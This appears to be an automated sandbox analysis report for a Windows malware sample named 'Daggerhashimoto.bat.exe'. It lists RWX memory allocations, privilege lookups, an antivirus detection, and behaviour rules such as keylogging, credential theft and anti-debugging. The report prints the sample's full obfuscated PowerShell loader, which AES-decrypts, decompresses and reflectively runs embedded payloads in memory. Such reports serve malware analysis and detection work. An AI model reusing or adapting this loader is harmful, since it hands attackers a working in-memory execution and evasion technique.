allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -w hidden -c #
Microsoft Trojan:Script/Wacatac.H!ml
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a Windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Steal credential rule local_credential_Steal
description Match Windows Http API call rule Str_Win32_Http_API
description Communications over P2P network rule Network_P2P_Win
description Match Windows Inet API call rule Str_Win32_Internet_API
description Escalate privileges rule Escalate_priviledges
description File Downloader rule Network_Downloader
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Take ScreenShot rule ScreenShot
cmdline "C:\Users\test22\AppData\Local\Temp\Daggerhashimoto.bat.exe" $MBjw='SMCKsplMCKsiMCKstMCKs'.Replace('MCKs', '');$Zazk='CrMCKseaMCKsteMCKsDecMCKsryMCKspMCKstorMCKs'.Replace('MCKs', '');$pgyS='TMCKsraMCKsnMCKssfoMCKsrmMCKsFMCKsinMCKsalBMCKslocMCKskMCKs'.Replace('MCKs', '');$rnTg='LoaMCKsdMCKs'.Replace('MCKs', '');$yITi='MaMCKsinMCKsMoMCKsdMCKsuMCKsleMCKs'.Replace('MCKs', '');$byHR='InMCKsvMCKsokMCKseMCKs'.Replace('MCKs', '');$JJhF='ReaMCKsdMCKsLiMCKsneMCKssMCKs'.Replace('MCKs', '');$ddgl='FrMCKsomBMCKsasMCKse6MCKs4SMCKstMCKsrMCKsiMCKsnMCKsgMCKs'.Replace('MCKs', '');$Nzus='ChMCKsaMCKsnMCKsgMCKseExMCKstensMCKsioMCKsnMCKs'.Replace('MCKs', '');$qiSi='EnMCKstrMCKsyPMCKsoMCKsintMCKs'.Replace('MCKs', '');$KqEJ='GeMCKstCMCKsuMCKsrrenMCKstMCKsPrMCKsoMCKscessMCKs'.Replace('MCKs', '');$YUqa='FMCKsiMCKsrsMCKstMCKs'.Replace('MCKs', '');function VXISz($xJrBE){$UoLXN=[System.Security.Cryptography.Aes]::Create();$UoLXN.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UoLXN.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UoLXN.Key=[System.Convert]::$ddgl('fSbE/ELtQVO/Dxms7Zp6CXdDpMkm3eOggmV7ILPMdik=');$UoLXN.IV=[System.Convert]::$ddgl('m1sJUnjHj7LNCIVQjqF9xQ==');$HMveB=$UoLXN.$Zazk();$LvnIY=$HMveB.$pgyS($xJrBE,0,$xJrBE.Length);$HMveB.Dispose();$UoLXN.Dispose();$LvnIY;}function dZeca($xJrBE){$pwdAe=New-Object System.IO.MemoryStream(,$xJrBE);$kHODJ=New-Object System.IO.MemoryStream;$xUoxC=New-Object System.IO.Compression.GZipStream($pwdAe,[IO.Compression.CompressionMode]::Decompress);$xUoxC.CopyTo($kHODJ);$xUoxC.Dispose();$pwdAe.Dispose();$kHODJ.Dispose();$kHODJ.ToArray();}$DnbCX=[System.Linq.Enumerable]::$YUqa([System.IO.File]::$JJhF([System.IO.Path]::$Nzus([System.Diagnostics.Process]::$KqEJ().$yITi.FileName, $null)));$VdgtA=$DnbCX.Substring(3).$MBjw(':');$tdiJC=dZeca (VXISz ([Convert]::$ddgl($VdgtA[0])));$fSFdV=dZeca (VXISz 
([Convert]::$ddgl($VdgtA[1])));[System.Reflection.Assembly]::$rnTg([byte[]]$fSFdV).$qiSi.$byHR($null,$null);[System.Reflection.Assembly]::$rnTg([byte[]]$tdiJC).$qiSi.$byHR($null,$null);
option -w hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe